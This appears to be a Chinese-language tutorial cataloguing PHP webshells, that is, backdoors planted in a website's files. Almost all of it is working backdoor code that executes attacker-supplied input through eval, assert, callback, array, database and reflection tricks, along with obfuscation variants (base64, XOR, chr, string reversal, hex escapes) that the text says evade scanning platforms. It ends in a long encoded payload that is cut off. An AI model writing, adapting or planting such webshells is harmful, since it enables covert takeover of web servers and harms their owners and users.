一、webshell简介

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。

顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。

二、webshell分类

1、eval

接受一个参数,将字符串作为PHP代码执行

eval($_POST[1]);

2、assert

一般接受一个参数,php 5.4.8版本后可以接受两个参数

assert($_REQUEST[l])

3、正则匹配类

preg_replace/ mb_ereg_replace/preg_filter等

4、文件包含类

include/include_once/require/require_once/file_get_contents

5、回调函数

call_user_func

call_user_func('assert', $_REQUEST['pass']);

//或者

$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e))

三、webshell变种

assert 和 eval 基本上都被用烂了,分分钟就被检查出来了,所以网上有很多种变种,可以做后门的函数一般包含以下几个关键词:1、 callable  2、mixed $options  3、callback  4、handler

下面是具体的变种,更具隐蔽性

1、无明显回调

ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();

2、单个参数

$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);

或者

$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['pass']);

或者

filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));

只要指定过滤方法为回调(FILTER_CALLBACK),且option为assert即可。

3、回调函数

call_user_func('assert', $_REQUEST['pass']);
call_user_func_array('assert', array($_REQUEST['pass']));

或者

<?php
error_reporting(0);
if ($_REQUEST['session'] == 1) {
$session = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); //assert
// open第一个被调用,类似 类的构造函数
function open($save_path, $session_name) {
}
// close最后一个被调用,类似 类的析构函数
function close() {
}
// 得到session id后,等价于执行assert($_REQUEST[phpcms])
session_id($_REQUEST[phpcms]);
function write($id, $sess_data) {
}
function destroy($id) {
}
function gc() {
}
// 第三个参数为read read(string $sessionId)
session_set_save_handler("open", "close", $session, "write", "destroy", "gc");
@session_start(); //会话打开的时候,自动调用回调函数
$cloud = $_SESSION["d"] = "c"; // 这句话没用
}
?>

4、数组

$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e))

或者

$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_map(base64_decode($e), $arr);

或者

$pass= "LandGrey";
array_udiff_assoc(array($_REQUEST[$pass]), array(1), "assert");

或者

$pass= "LandGrey";
$ch = explode(".","hello.ass.world.er.t");
array_intersect_ukey(array($_REQUEST[$pass] => 1), array(1), $ch[1].$ch[3].$ch[4]);

或者

$_clasc = $_REQUEST['mod'];
$arr = array($_POST['bato'] => '|.*|e',);
@array_walk_recursive($arr, $_clasc, ''); 

5、把部分信息放在代码以外

比如:脚本名称、header 中

$password = "LandGrey";
$key = substr(__FILE__,-5,-4);
${"LandGrey"} = $key."Land!";
$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
array_intersect_uassoc (array($_REQUEST[$password] => ""), array(1), $f);

将脚本命名为scanner.php, 硬编码脚本最后一位字符为"r",就不会被平台检测到

或者

$password = "LandGrey";
$ch = $_COOKIE["set-domain-name"];
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch."ert");

Cookie: set-domain-name=ass;

或者

$password = "LandGrey";
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
forward_static_call_array($wx."ert", array($_REQUEST[$password]));

Referer: http%3a//www.target.com/ass.php

6、数据库操作与第三方库中的回调后门

$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));

可以注册一个sqlite函数,使之与assert功能相同。当执行这个sql语句的时候,就等于执行了assert

$str = urlencode($_REQUEST['pass']);
$yaml = <<<EOD
greeting: !{$str} "|.+|e"
EOD;
$parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));

上面是使用php_yaml

$mem = new Memcache();
$re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));
$mem->connect($_REQUEST['pass'], 11211, 0);

还有php_memcached

7、反射

<?php
/**
* eva
* l($_POS
* T["c"]);
* asse
* rt
*/
class TestClass { }
$rc = new ReflectionClass('TestClass');
$str = $rc->getDocComment();
$payload = substr($str,strpos($str,'ev'),3);
$payload .= substr($str,strpos($str,'l('),7);
$payload .= substr($str,strpos($str,'T['),8);
$exe = substr($str, strpos($str, 'as'), 4);
$exe .= substr($str, strpos($str, 'rt'), 2); $exe($payload);
?>

四、隐藏关键词

1、混淆

<?php
//pwd=addimg
$sss = "ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NCcGMzTmxkQ2dnSkY5U1JWRlZSVk5VV3lkd1lYTnpKMTBnS1NsN1FHVjJZV3dvSUdKaGMyVTJORjlrWldOdlpHVW9JQ1JmVWtWUlZVVlRWRnNuY0dGemN5ZGRJQ2tnS1R0OVpXeHpaWHRBWlhaaGJDZ2dKRjlTUlZGVlJWTlVXeWRoWkdScGJXY25YU0FwTzMwPSIpKQ==";
function CheckSQL( &$val ){
$v = "select|update|union|set|where|order|and|or";
$val = base64_decode( $val );
}
CheckSQL( $sss );
preg_replace('/uploadsafe.inc.php/e','@'.$sss, 'uploadsafe.inc.php');
?>

 或者

<?php
$MMIC= $_GET['tid']?$_GET['tid']:$_GET['fid'];
if($MMIC >1000000){
die('404');
}
if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"]))
{
$__PHP_debug = array (
'ZendName' => '70,61,73,73',
'ZendPort' => '63,68,65,63,6b',
'ZendSalt' => '792e19812fafd57c7ac150af768d95ce'
); $__PHP_replace = array (
pack('H*', join('', explode(',', $__PHP_debug['ZendName']))),
pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))),
$__PHP_debug['ZendSalt']
); $__PHP_request = &$_POST;
$__PHP_token = md5($__PHP_request[$__PHP_replace[0]]); if ($__PHP_token == $__PHP_replace[2])
{
$__PHP_token = preg_replace (
chr(47).$__PHP_token.chr(47).chr(101),
$__PHP_request[$__PHP_replace[1]],
$__PHP_token
); unset (
$__PHP_debug,
$__PHP_replace,
$__PHP_request,
$__PHP_token
); if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!'); }
}

2、反引号

<?php
$cmd =base64_decode('dmVy='); // ver
echo `$cmd`. `$_GET[username]`; // ``反引号的作用相当于shell_exec,执行系统命令
//或
$var = `net user`;
echo "$var";
?> 

3、XOR

<?php
@$_++; // $_ = 1
$__=("#"^"|"); // $__ = _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

4、加号

<?php
$num = +"";
$num++; $num++; $num++; $num++;
$four = $num; // 4
$num++; $num++;
$six = $num; // 6
$_="";
$_[+$_]++; // +""为0
$_=$_.""; // $_为字符串"Array"
$___=$_[+""];//A
$____=$___;
$____++;//B
$_____=$____;
$_____++;//C
$______=$_____;
$______++;//D
$_______=$______;
$_______++;//E
$________=$_______;
$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;//O
$_________=$________;
$_________++;$_________++;$_________++;$_________++;//S
$_=$____.$___.$_________.$_______.$six.$four.'_'.$______.$_______.$_____.$________.$______.$_______;
$________++;$________++;$________++;//R
$_____=$_________;
$_____++;//T
$__=$___.$_________.$_________.$_______.$________.$_____;
$__($_("ZXZhbCgkX1BPU1RbY21kXSk="));
//ASSERT(BASE64_DECODE("ZXZhbCgkX1BPU1RbY21kXSk="));
//ASSERT(eval($_POST[cmd]));
?>

5、函数

<?php
$a=@strrev(ecalper_gerp);
$b=@strrev(edoced_46esab);
echo @$a($b(L3h4L2Ug),$_POST[jc],axxa); // /xx/e
?>

6、chr

<?php
assert(chr(97).chr(115).chr(115).chr(101).chr(114).chr(116).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41)); // chr解出来是assert($_POST[x]),不能替换成eval(chr(97).chr(115)
?>

7、session_set_save_handler

<?php
error_reporting(0);
if ($_REQUEST['session'] == 1) {
$session = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); //assert
// open第一个被调用,类似 类的构造函数
function open($save_path, $session_name) {
}
// close最后一个被调用,类似 类的析构函数
function close() {
}
// 得到session id后,等价于执行assert($_REQUEST[phpcms])
session_id($_REQUEST[phpcms]);
function write($id, $sess_data) {
}
function destroy($id) {
}
function gc() {
}
// 第三个参数为read read(string $sessionId)
session_set_save_handler("open", "close", $session, "write", "destroy", "gc");
@session_start(); //会话打开的时候,自动调用回调函数
$cloud = $_SESSION["d"] = "c"; // 这句话没用
}
?>

8、引号

<?php
$LMsW="p"."r"."e"."g"."_r"."epl"."a"."ce";
$LMsW("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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